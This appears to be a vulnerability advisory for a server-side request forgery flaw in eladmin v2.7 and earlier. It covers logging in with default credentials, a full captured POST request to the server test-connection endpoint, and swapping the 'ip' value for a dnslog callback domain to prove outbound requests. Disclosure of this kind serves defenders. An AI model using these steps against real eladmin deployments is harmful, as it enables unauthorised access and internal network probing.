Skip to content

Latest commit

 

History

History
55 lines (37 loc) · 2.84 KB

eladmin_ssrf.md

File metadata and controls

55 lines (37 loc) · 2.84 KB
Raw

eladmin_ssrf

BUG_Author: shadia0

Affected version: eladmin v2.7 and before

Project Link: https://github.com/elunez/eladmin

URL: /api/serverDeploy/testConnect

Parameter: "ip"(POST)

Description:

The eladmin v2.7 and before is vulnerable to Server-Side Request Forgery (SSRF) via ServerDeployController.java.

  1. Log in to the backend with the project's default password admin/123456. Select '运维管理(Operations Management)' - '服务器(Server)' - '新增(Add New Server)' from the left menu in order, the server configuration box pops up. Here you can fill in the server's IP. If you directly fill in a domain name here, it will be intercepted by the front end, but the back-end interface does not do this check.
image image
  1. By filling in a valid IP and clicking 测试连接(Test Connection), you can trigger the following request packet.
POST /api/serverDeploy/testConnect HTTP/1.1
Host: localhost:8013
Content-Length: 104
sec-ch-ua: 
Accept: application/json, text/plain, */*
Content-Type: application/json
sec-ch-ua-mobile: ?0
Authorization: Bearer eyJhbGciOiJIUzUxMiJ9.eyJqdGkiOiJiM2E5OWNkY2NiNzk0NzRjOGUzYTUyN2E1ZmUzY2NiYiIsInVzZXIiOiJhZG1pbiIsInN1YiI6ImFkbWluIn0.NmbDtGywNsCE1dtK8ilWCwsEoPxO5F-aqj2jBIzyq45EDYfF9-PTqakUJz50fRo-D-sX8cBJpwQAUZpevgyijQ
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36
sec-ch-ua-platform: ""
Origin: http://localhost:8013
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8013/mnt/mnt/serverDeploy
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ELADMIN-TOEKN=Bearer%20eyJhbGciOiJIUzUxMiJ9.eyJqdGkiOiJiM2E5OWNkY2NiNzk0NzRjOGUzYTUyN2E1ZmUzY2NiYiIsInVzZXIiOiJhZG1pbiIsInN1YiI6ImFkbWluIn0.NmbDtGywNsCE1dtK8ilWCwsEoPxO5F-aqj2jBIzyq45EDYfF9-PTqakUJz50fRo-D-sX8cBJpwQAUZpevgyijQ
Connection: close

{"id":null,"name":"test_server","ip":"127.0.0.1","port":2222,"account":"root","password":"wrong"}
  1. Generate a subdomain lg2phe.dnslog.cn on the dnslog platform, then change the IP parameter to lg2phe.dnslog.cn and send the request. It is found that the dns request parsing record is obtained on the dnslog platform, proving the ssrf vulnerability. (There are no requirements for other parameters such as account, password, etc., and you do not need to fill in the correct username and password to trigger the vulnerability)
image image